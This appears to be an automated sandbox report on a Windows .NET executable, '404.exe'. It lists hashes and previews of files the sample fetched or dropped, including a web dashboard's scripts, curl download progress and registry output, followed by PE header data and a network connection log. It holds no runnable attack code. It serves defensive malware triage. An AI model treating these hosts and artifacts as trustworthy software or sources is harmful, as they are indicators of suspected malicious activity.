                                                                                                                                                                                                                                                          SHA-256:634452B54F1A478056C7549C96D3343103E69FF3890D9735A59B061201CB7D48
                                                                                                                                                                                                                                                          SHA-512:AC692658620E0D019A2CEC8D1197A8F87EACE856E5796AD248A00586AC6833B35A244465609EA341062133C65356F08534610F54B46C855CE45C6099AFCF857D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/Modal.module-d62c47b8.js
                                                                                                                                                                                                                                                          Preview:import{au as n}from"./index-004f4025.js";const r=(e,o,t)=>{switch(o){case"increase":return e.sort((s,a)=>s[t]>a[t]?1:-1);case"decrease":return e.sort((s,a)=>s[t]<a[t]?1:-1)}},y=n("modal",{state:()=>({modalsQueue:[]}),getters:{isActiveAnyModal(e){return!!e.modalsQueue.length}},actions:{updateModalsQueue(e){if(e.priority>1e3||e.priority<0)throw new Error("Priority should be less than 1001 and positive");this.modalsQueue.push(e);const o=r(this.modalsQueue,"decrease","priority");this.modalsQueue=[...o]},hideModal(e){this.modalsQueue=this.modalsQueue.filter(o=>o.id!==e)},clearQueue(){this.modalsQueue=[]}}}),c="_5kL4TPdD",l="eoPx-XfL",d="-uFEEehb",u="fMo3ZVEl",i="_6sPwaxyC",m="LL0-2zyj",L="_8u3lj-7P",f="OCt9ytvK",v="NhW0oA55",h="_0yU2sS3O",T="_2Qha-LQ3",Q="_39-eKlaL",E="_1HrmGkwL",_="B5v0MvTK",p="Kuf5IxtV",F={modal:c,"modal-hidden":"eoPx-XfL",modalHidden:l,backdrop:d,"modal-ar":"fMo3ZVEl",modalAr:u,content:i,"close-button":"LL0-2zyj",closeButton:m,"close-button-icon":"_8u3lj-7P",closeButtonI
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Java source, Unicode text, UTF-8 text, with very long lines (5161)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):5163
                                                                                                                                                                                                                                                          Entropy (8bit):5.370031062210679
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:465cseIJOXqXSC4fUB0R7np5n9Tpivy3rhUQZ0/t/wk5wRwKvQH8n/:4O1XSC4Y0xnpt9tEy3SQZ8Bwk5CvQH8/
                                                                                                                                                                                                                                                          MD5:E6BC7C31B43816CEFAF80A03CD93DB22
                                                                                                                                                                                                                                                          SHA1:47C88ACD158A35C26EE7457D3521F0C93C29FB6E
                                                                                                                                                                                                                                                          SHA-256:C5545CD432E5A08437298FC0F38EFA01E077C49C97EE7B64CD6AE3AA24A9DF36
                                                                                                                                                                                                                                                          SHA-512:3F8276ACBF8955CFBC4D5B0E067362AEEA6C56B00600666EDEA3DF0CF5480DD46DAC884FBBF9F41971F842DBC374B7414A0A0A715377668F175AAA5293B9760D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/index-1178777c.js
                                                                                                                                                                                                                                                          Preview:import{d as F,o as I,b as D,i as P,r as gt,n as r,u as t,au as pt,g as H,E as _t,F as ft,$ as vt,D as Et,M as u,c as w,p as x,R as y,s as ht,at as wt,h as s,y as d,az as xt,am as yt,e as St}from"./index-004f4025.js";import{a as W,u as Lt,b as Pt,d as Bt}from"./ConfirmPhoneModal.module-3f369b32.js";import{_ as B}from"./Text.vue_vue_type_script_setup_true_lang-a664542d.js";import{u as Ft,_ as It,a as kt}from"./Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js";import"./Button.module-6d4e91b8.js";import"./ButtonTemplate.module-c837805f.js";import"./ButtonText.module-c769b9ae.js";import"./Modal.module-d62c47b8.js";import{_ as S}from"./Button.vue_vue_type_script_setup_true_lang-56edf5a6.js";import{_ as L}from"./ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js";import{u as Ct}from"./useValidation-954c07e6.js";import{_ as q}from"./Input.vue_vue_type_script_setup_true_lang-31858815.js";import"./loop-c45f0f1e.js";const Mt=F({__name:"AuthCard",setup(o){return(a,v)=>(I(),D("div"
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):271541
                                                                                                                                                                                                                                                          Entropy (8bit):5.571843432215525
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:2k3n+yZmkryzjrgBB9Tch2+4jm8eTVcwOuw4z:tuumkrtkOI
                                                                                                                                                                                                                                                          MD5:C2E7528AE760B43C1CA361AF12F2D984
                                                                                                                                                                                                                                                          SHA1:BB1173F42813064031C69C0615E77CFE191F2264
                                                                                                                                                                                                                                                          SHA-256:7BA5B143A0A0E2EE8799112088943D2023FD4694B97E7A5772F83508486DDDA4
                                                                                                                                                                                                                                                          SHA-512:F503C2C3614100CB6AB2611DF976FEEAA7A615D25BF4EFB4FB71EADE07AFC7524D8A80A3C7800540D56B65D20A154DC0C7798E805037E59105F9D177B32F5431
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-1S18THVZ27&l=dataLayer
                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":11},{"function":"__ogt_ip_mark","priority":6,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":13},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","spyrix\\.com"],"tag_id":14},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":15},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"",
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Java source, Unicode text, UTF-8 text, with very long lines (5161)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5163
                                                                                                                                                                                                                                                          Entropy (8bit):5.370031062210679
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:465cseIJOXqXSC4fUB0R7np5n9Tpivy3rhUQZ0/t/wk5wRwKvQH8n/:4O1XSC4Y0xnpt9tEy3SQZ8Bwk5CvQH8/
                                                                                                                                                                                                                                                          MD5:E6BC7C31B43816CEFAF80A03CD93DB22
                                                                                                                                                                                                                                                          SHA1:47C88ACD158A35C26EE7457D3521F0C93C29FB6E
                                                                                                                                                                                                                                                          SHA-256:C5545CD432E5A08437298FC0F38EFA01E077C49C97EE7B64CD6AE3AA24A9DF36
                                                                                                                                                                                                                                                          SHA-512:3F8276ACBF8955CFBC4D5B0E067362AEEA6C56B00600666EDEA3DF0CF5480DD46DAC884FBBF9F41971F842DBC374B7414A0A0A715377668F175AAA5293B9760D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:import{d as F,o as I,b as D,i as P,r as gt,n as r,u as t,au as pt,g as H,E as _t,F as ft,$ as vt,D as Et,M as u,c as w,p as x,R as y,s as ht,at as wt,h as s,y as d,az as xt,am as yt,e as St}from"./index-004f4025.js";import{a as W,u as Lt,b as Pt,d as Bt}from"./ConfirmPhoneModal.module-3f369b32.js";import{_ as B}from"./Text.vue_vue_type_script_setup_true_lang-a664542d.js";import{u as Ft,_ as It,a as kt}from"./Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js";import"./Button.module-6d4e91b8.js";import"./ButtonTemplate.module-c837805f.js";import"./ButtonText.module-c769b9ae.js";import"./Modal.module-d62c47b8.js";import{_ as S}from"./Button.vue_vue_type_script_setup_true_lang-56edf5a6.js";import{_ as L}from"./ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js";import{u as Ct}from"./useValidation-954c07e6.js";import{_ as q}from"./Input.vue_vue_type_script_setup_true_lang-31858815.js";import"./loop-c45f0f1e.js";const Mt=F({__name:"AuthCard",setup(o){return(a,v)=>(I(),D("div"
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\curl.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CR, LF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2295
                                                                                                                                                                                                                                                          Entropy (8bit):3.2884633946081125
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:HkyH+bJiVP960KkU3v9/nE/IhNNguZd5jQFOOrjaPVyTn5rOJXKLmxm/DWusxF:Hky+iLmkEv9v9NNzdmr5rOY/DWusxF
                                                                                                                                                                                                                                                          MD5:3F0AE6E422A39C784B2B70E2E3C6115F
                                                                                                                                                                                                                                                          SHA1:6672B04ED8936107E1C0FE88515F041C64CFFD33
                                                                                                                                                                                                                                                          SHA-256:3587CCDD51986D320B4519EF664CE9C3EC10B65EDE4FB57A13DE44E6664D96BB
                                                                                                                                                                                                                                                          SHA-512:E1F98638F212C487AC1158D7CBC5BFAD7A8D0EEF526F21A47B0ADFB20B44201F631EA785D2C9C564F759E43CA2E68879D1D8C76F227A829496261E0A53D5A0C1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 31.8M 0 319k 0 0 254k 0 0:02:08 0:00:01 0:02:07 254k. 4 31.8M 4 1631k 0 0 749k 0 0:00:43 0:00:02 0:00:41 749k. 9 31.8M 9 3071k 0 0 966k 0 0:00:33 0:00:03 0:00:30 967k. 13 31.8M 13 4415k 0 0 1052k 0 0:00:31 0:00:04 0:00:27 1052k. 17 31.8M 17 5839k 0 0 1124k 0 0:00:29 0:00:05 0:00:24 1178k. 22 31.8M 22 7231k 0 0 1168k 0 0:00:27 0:00:06 0:00:21 1400k. 26 31.8M 26 8631k 0 0 1200k 0 0:00:27 0:00:07 0:00:20 1397k. 31 31.8M 31 9.8M 0 0 1233k 0 0:00:26 0:00:08 0:00:18 1401k. 35 31.8M 35 11.1M 0 0 1244k 0 0:
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):243
                                                                                                                                                                                                                                                          Entropy (8bit):5.025903567998292
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:rbsd3u6eWFF60OckSi23oH+H1gFyeWFF60OckSi23fksgeWFF60OckSi23fhn:QNFFvO4ZYeVAyNFFvO4ZssgNFFvO4ZZn
                                                                                                                                                                                                                                                          MD5:5F73D6EB745036C1AFF17E55835C42B2
                                                                                                                                                                                                                                                          SHA1:603662F0180E4B5AACD9DCDFB01738C0D29F7A3F
                                                                                                                                                                                                                                                          SHA-256:11C4731706427EC108A02F9FD527EC7DEEA25F012233B5F6EEC8D10F615CB631
                                                                                                                                                                                                                                                          SHA-512:E9B3B307A6CBC6EE6219347ED24246AFE1197CEE2A1AC621C7E8035DD32B9CAB256F80155D66E7580AFEE7022264CEE105EE08A380BE5960C30E26D3E2277E43
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:..HKEY_USERS\S-1-5-19\Environment.. Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;.. TEMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp.. TMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp....
                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                          Entropy (8bit):7.725524916177281
                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                                          File name:404.exe
                                                                                                                                                                                                                                                          File size:90'112 bytes
                                                                                                                                                                                                                                                          MD5:d15daef371b50fb739401bfde29df35a
                                                                                                                                                                                                                                                          SHA1:d916c598aff72aaf461a5427cd7c6440c199ff24
                                                                                                                                                                                                                                                          SHA256:ee8a52deddf45bac9caa60205f83488ee644ffd1ea01998774d68c7f46568b71
                                                                                                                                                                                                                                                          SHA512:4145f4a52d7098b5543efefdbf2810b403ba82036f2ef254f458d0084da839636f9d4dc5ec3016065fdfccf6468da301c4da523ece1244fd23efb1fd288d5529
                                                                                                                                                                                                                                                          SSDEEP:1536:Fmb6bAx1Aw+M+JqPSMr49ucL+91yhgwCqnkLrcIN6mE:Fm+b/zqPSMr49uiSUf
                                                                                                                                                                                                                                                          TLSH:D193F1603BF9871BD2785E3859F67B0147B6AE166906DF8E1DC8B05F6DB371402C2A23
                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W->..........."...0..P.........."n... ........@.. ....................................`................................
                                                                                                                                                                                                                                                          Icon Hash:236959716569338e
                                                                                                                                                                                                                                                          Entrypoint:0x416e22
                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                          Time Stamp:0xFC3E2D57 [Fri Feb 8 17:01:11 2104 UTC]
                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x16dd00x4f.text
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000xaa0.rsrc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a0000xc.reloc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x16db40x1c.text
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                          .text0x20000x14e280x15000a135ff2cca68dc8c711f24903f640245False0.922119140625data7.81759162350406IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .rsrc0x180000xaa00xc00df25321e9d65b54051c62a01523d6a24False0.3551432291666667data4.219239603448153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .reloc0x1a0000xc0x2004841e7189fe8b30a7d5810f49c13b925False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                          RT_ICON0x181000x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.34131205673758863
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x185780x14data1.1
                                                                                                                                                                                                                                                          RT_VERSION0x1859c0x304data0.4339378238341969
                                                                                                                                                                                                                                                          RT_MANIFEST0x188b00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                          mscoree.dll_CorExeMain
                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:19.879203081 CEST49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:20.256937981 CEST49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:20.413202047 CEST49674443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:20.416857958 CEST49675443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:20.585069895 CEST49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:20.616323948 CEST49671443192.168.2.7204.79.197.203
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:21.006933928 CEST49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:22.506849051 CEST49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:24.993220091 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:24.993252039 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:24.993311882 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:25.014641047 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:25.014658928 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:25.491225958 CEST49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:25.801105976 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:25.801248074 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:25.941901922 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:25.941920042 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:25.942393064 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:25.991343021 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.333703041 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.375411987 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.762645006 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.762676001 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.762734890 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.762762070 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.762806892 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.763046026 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.763107061 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.763710976 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.763762951 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.763776064 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.763782024 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.763817072 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.763823986 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.763839006 CEST4434970223.109.93.100192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:26.764010906 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:29.378215075 CEST49706443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:29.378259897 CEST44349706184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:29.378333092 CEST49706443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:29.379965067 CEST49706443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:29.379978895 CEST44349706184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.022521973 CEST49674443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.022537947 CEST49675443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.030807972 CEST44349706184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.030896902 CEST49706443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.033679962 CEST49706443192.168.2.7184.28.90.27
